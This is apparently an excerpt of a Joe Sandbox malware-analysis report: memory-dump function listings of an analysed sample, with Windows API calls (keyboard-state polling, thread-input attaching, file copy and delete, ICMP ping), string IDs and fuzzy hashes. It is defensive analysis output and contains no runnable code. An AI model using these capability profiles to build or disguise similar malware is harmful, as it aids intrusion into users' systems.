                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003ECC3A
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003ECC4B
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003ECC5D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 152968663-0
                                                                                                                      • Opcode ID: 8d26bff255eab52c226894755751bba2b840fab0dd2900f243b012dfb0a0dedc
                                                                                                                      • Instruction ID: 33df7a748d7ac7e02944ec83b7d8eb32663b06ef827f6b68dc5493ae8dbb5c1e
                                                                                                                      • Opcode Fuzzy Hash: 8d26bff255eab52c226894755751bba2b840fab0dd2900f243b012dfb0a0dedc
                                                                                                                      • Instruction Fuzzy Hash: A5C12BB1D00229AECF12DFA5CC81EEEB7BDEF49310F1041AAF609E6151D7709A858F65
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3566271842-0
                                                                                                                      • Opcode ID: e0c1faf2fc608300b39d37d428667b4c7bdd43991c36b35263579e05f3b31c4f
                                                                                                                      • Instruction ID: f1b49ff39a2181d6703e80757b64bbfbd28fa4726ccab1f8e2a44cedc6204577
                                                                                                                      • Opcode Fuzzy Hash: e0c1faf2fc608300b39d37d428667b4c7bdd43991c36b35263579e05f3b31c4f
                                                                                                                      • Instruction Fuzzy Hash: EF712F75A00219AFDB15EFA4C885ADEB7B8FF49310F048495E919EB262D730EE41CF94
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 003E3908
                                                                                                                      • SetKeyboardState.USER32(?), ref: 003E3973
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 003E3993
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 003E39AA
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 003E39D9
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 003E39EA
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 003E3A16
                                                                                                                      • GetKeyState.USER32(00000011), ref: 003E3A24
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 003E3A4D
                                                                                                                      • GetKeyState.USER32(00000012), ref: 003E3A5B
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 003E3A84
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 003E3A92
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 90c42f468541628018c4c17e9df56a1c95ce40bdccadcdec266d1cadb12953d8
                                                                                                                      • Instruction ID: 05dc2fdac48ab9a1955d01009dcf65631675a0a8d5760734b0b2d7df263df63f
                                                                                                                      • Opcode Fuzzy Hash: 90c42f468541628018c4c17e9df56a1c95ce40bdccadcdec266d1cadb12953d8
                                                                                                                      • Instruction Fuzzy Hash: 1A51E830A047E429FB36EBA688157EAAFB45F01340F49479DD5C25B1C2DB649B8CC762
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 003DFB19
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 003DFB2B
                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003DFB89
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 003DFB94
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 003DFBA6
                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003DFBFC
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 003DFC0A
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 003DFC1B
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003DFC5E
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 003DFC6C
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003DFC89
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 003DFC96
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: 83d244b748ed4ee5d36a1c82a66a9a40c5436fdcb5d8e59f350aa2788b983f47
                                                                                                                      • Instruction ID: 0e30055f940d7eb19bbd215ceae1bed565b79f575b8d637d7a7b695447f2e790
                                                                                                                      • Opcode Fuzzy Hash: 83d244b748ed4ee5d36a1c82a66a9a40c5436fdcb5d8e59f350aa2788b983f47
                                                                                                                      • Instruction Fuzzy Hash: 4F512071B00209AFDB18CF68DD95BAEBBBAEB88310F558139F916D7290D7B09D41CB10
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 003BB067
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ColorLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 259745315-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 136442275-0
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0040B204
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 634782764-2594219639
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0041E9EA
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0041EA0B
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0041EA20
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0041EA3D
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0041EA64
                                                                                                                      • DestroyCursor.USER32(00000000), ref: 0041EA6F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0041EA8C
                                                                                                                      • DestroyCursor.USER32(00000000), ref: 0041EA97
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3992029641-2594219639
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 003A84E5
                                                                                                                      • __itow.LIBCMT ref: 003A8519
                                                                                                                        • Part of subcall function 003C2177: _xtow@16.LIBCMT ref: 003C2198
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: __itow__swprintf_xtow@16
                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 1502193981-2263619337
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003DC782
                                                                                                                      • GetDlgCtrlID.USER32 ref: 003DC78D
                                                                                                                      • GetParent.USER32 ref: 003DC7A9
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 003DC7AC
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 003DC7B5
                                                                                                                      • GetParent.USER32(?), ref: 003DC7D1
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 003DC7D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 313823418-2258501812
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003DC869
                                                                                                                      • GetDlgCtrlID.USER32 ref: 003DC874
                                                                                                                      • GetParent.USER32 ref: 003DC890
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 003DC893
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 003DC89C
                                                                                                                      • GetParent.USER32(?), ref: 003DC8B8
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 003DC8BB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 313823418-2258501812
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 003DC8D9
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 003DC8EE
                                                                                                                      • _wcscmp.LIBCMT ref: 003DC900
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003DC97B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                      • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1704125052-1428604138
                                                                                                                      • Opcode ID: b9d427b678706b38c5dec45f47abcf99e8e5ddd0b0635a9f56b366287e4c3d72
                                                                                                                      • Instruction ID: 1d1b537b89820693410b844c4ae764746015b67be45765c3b05b00168ad7833d
                                                                                                                      • Opcode Fuzzy Hash: b9d427b678706b38c5dec45f47abcf99e8e5ddd0b0635a9f56b366287e4c3d72
                                                                                                                      • Instruction Fuzzy Hash: 3D11A777668303B9F6162A30AC16EA6779C9B07760B200027F900E91D3FBB57D029658
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003E5816
                                                                                                                      • GetMenuItemInfoW.USER32(004618F0,000000FF,00000000,00000030), ref: 003E5877
                                                                                                                      • SetMenuItemInfoW.USER32(004618F0,00000004,00000000,00000030), ref: 003E58AD
                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 003E58BF
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 003E5903
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 003E591F
                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 003E5949
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 003E598E
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003E59D4
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E59E8
                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E5A09
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4176008265-0
                                                                                                                      • Opcode ID: 2ab1fae484f9065489edfd3eca1b9e9cf7827ab34010caa26c99cd263c39f674
                                                                                                                      • Instruction ID: 255fac8b21e771c523fd65285690a20a4f592f1614b85b471ef80d368c6d3d5e
                                                                                                                      • Opcode Fuzzy Hash: 2ab1fae484f9065489edfd3eca1b9e9cf7827ab34010caa26c99cd263c39f674
                                                                                                                      • Instruction Fuzzy Hash: 7961B2B0A006E9EFDF12CF65C984AEE7BB8EB0131CF150269F541A7291D770AD41CB21
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00409AA5
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00409AA8
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00409ACC
                                                                                                                      • _memset.LIBCMT ref: 00409ADD
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00409AEF
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00409B67
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 830647256-0
                                                                                                                      • Opcode ID: 9e5bc206289d925035b95455f8108da26a881dc520d9797d99c9dc98c670080a
                                                                                                                      • Instruction ID: 8da661a9f1b5a7e0fc94a544e9e151a71c6ac68a5c85aadcb2895d19d228aacb
                                                                                                                      • Opcode Fuzzy Hash: 9e5bc206289d925035b95455f8108da26a881dc520d9797d99c9dc98c670080a
                                                                                                                      • Instruction Fuzzy Hash: 70617B75A00208AFDB11DFA4CC81EEE77B8AB49710F14016AFA14A72E2D774AD45DB94
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 003E3591
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 003E3612
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 003E362D
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 003E3647
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 003E365C
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 003E3674
                                                                                                                      • GetKeyState.USER32(00000011), ref: 003E3686
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 003E369E
                                                                                                                      • GetKeyState.USER32(00000012), ref: 003E36B0
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 003E36C8
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 003E36DA
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 61ec40b520ed4af70849dd2e1ff6463d37624e3f5771f64747d9b13a0de1859d
                                                                                                                      • Instruction ID: de3e8d5d3ceeb6e73d5db8191d7f2bfaeb872c190ada46c27ad80f504323e946
                                                                                                                      • Opcode Fuzzy Hash: 61ec40b520ed4af70849dd2e1ff6463d37624e3f5771f64747d9b13a0de1859d
                                                                                                                      • Instruction Fuzzy Hash: 24410530A047D97DFF328B76884C3A5BEA06B12344F458259D5C2473C2EBE49BC8CB66
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003DA2AA
                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 003DA2F5
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003DA307
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 003DA327
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 003DA36A
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 003DA37E
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003DA393
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 003DA3A0
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003DA3A9
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003DA3BB
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003DA3C6
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: 05d0f55b65ebae0a4a3981aae24f10b9cf50046e7c39c36e5efc1daa7c57d67c
                                                                                                                      • Instruction ID: f374c6f65e5fc87777019c63db90607984c470afd5fbd6bf6cf55c90c302a3a7
                                                                                                                      • Opcode Fuzzy Hash: 05d0f55b65ebae0a4a3981aae24f10b9cf50046e7c39c36e5efc1daa7c57d67c
                                                                                                                      • Instruction Fuzzy Hash: 4F415F35E00219AFCB12EFA4DD849DEBBB9FF48304F508065F501A7261DB34EA46CBA1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • CoInitialize.OLE32 ref: 003FB298
                                                                                                                      • CoUninitialize.COMBASE ref: 003FB2A3
                                                                                                                      • CoCreateInstance.COMBASE(?,00000000,00000017,0042D8FC,?), ref: 003FB303
                                                                                                                      • IIDFromString.COMBASE(?,?), ref: 003FB376
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003FB410
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003FB471
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                      • Opcode ID: 9115908c100ea25acc3c8728a678b8b06284a26aaeb6e9aaf76db10cd28ed6ff
                                                                                                                      • Instruction ID: ad7889c2a2e4517e1e8033a4661b907892b19797e4f92d0d9dcb58d74950e094
                                                                                                                      • Opcode Fuzzy Hash: 9115908c100ea25acc3c8728a678b8b06284a26aaeb6e9aaf76db10cd28ed6ff
                                                                                                                      • Instruction Fuzzy Hash: 5061CCB1604315AFC312DF54C984B6EF7E8AF88714F10081AFA859B291CB70ED48CB92
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 003BC2D2
                                                                                                                        • Part of subcall function 003BC697: GetClientRect.USER32(?,?), ref: 003BC6C0
                                                                                                                        • Part of subcall function 003BC697: GetWindowRect.USER32(?,?), ref: 003BC701
                                                                                                                        • Part of subcall function 003BC697: ScreenToClient.USER32(?,?), ref: 003BC729
                                                                                                                      • GetDC.USER32 ref: 0041E006
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041E019
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041E027
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041E03C
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0041E044
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0041E0CF
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: @U=u$U
                                                                                                                      • API String ID: 4009187628-4110099822
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 003F86F5
                                                                                                                      • inet_addr.WS2_32(?), ref: 003F873A
                                                                                                                      • gethostbyname.WS2_32(?), ref: 003F8746
                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 003F8754
                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003F87C4
                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003F87DA
                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003F884F
                                                                                                                      • WSACleanup.WS2_32 ref: 003F8855
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                      • String ID: Ping
                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00409C68
                                                                                                                      • CreateMenu.USER32 ref: 00409C83
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00409C92
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00409D1F
                                                                                                                      • IsMenu.USER32(?), ref: 00409D35
                                                                                                                      • CreatePopupMenu.USER32 ref: 00409D3F
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00409D70
                                                                                                                      • DrawMenuBar.USER32 ref: 00409D7E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 176399719-4108050209
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003EEC1E
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003EEC94
                                                                                                                      • GetLastError.KERNEL32 ref: 003EEC9E
                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 003EED0B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00408CF3
                                                                                                                      • GetDC.USER32(00000000), ref: 00408CFB
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00408D06
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00408D12
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00408D4E
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00408D5F
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0040BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00408D99
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00408DB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3864802216-2594219639
                                                                                                                      APIs
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 003EB137
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1725837607-0
                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 003CBA74
                                                                                                                        • Part of subcall function 003C8984: __mtinitlocknum.LIBCMT ref: 003C8996
                                                                                                                        • Part of subcall function 003C8984: RtlEnterCriticalSection.NTDLL(003C0127), ref: 003C89AF
                                                                                                                      • __calloc_crt.LIBCMT ref: 003CBA85
                                                                                                                        • Part of subcall function 003C7616: __calloc_impl.LIBCMT ref: 003C7625
                                                                                                                        • Part of subcall function 003C7616: Sleep.KERNEL32(00000000,?,003C0127,?,003A125D,00000058,?,?), ref: 003C763C
                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 003CBAA0
                                                                                                                      • GetStartupInfoW.KERNEL32(?,00456990,00000064,003C6B14,004567D8,00000014), ref: 003CBAF9
                                                                                                                      • __calloc_crt.LIBCMT ref: 003CBB44
                                                                                                                      • GetFileType.KERNEL32(00000001), ref: 003CBB8B
                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 003CBBC4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1426640281-0
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003E4A7D
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4A91
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 003E4A98
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4AA7
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 003E4AB9
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4AD2
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4AE4
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4B29
                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4B3E
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003E3AD7,?,00000001), ref: 003E4B49
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      APIs
                                                                                                                      • EnumChildWindows.USER32(?,003DDD46), ref: 003DDC86
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                      APIs
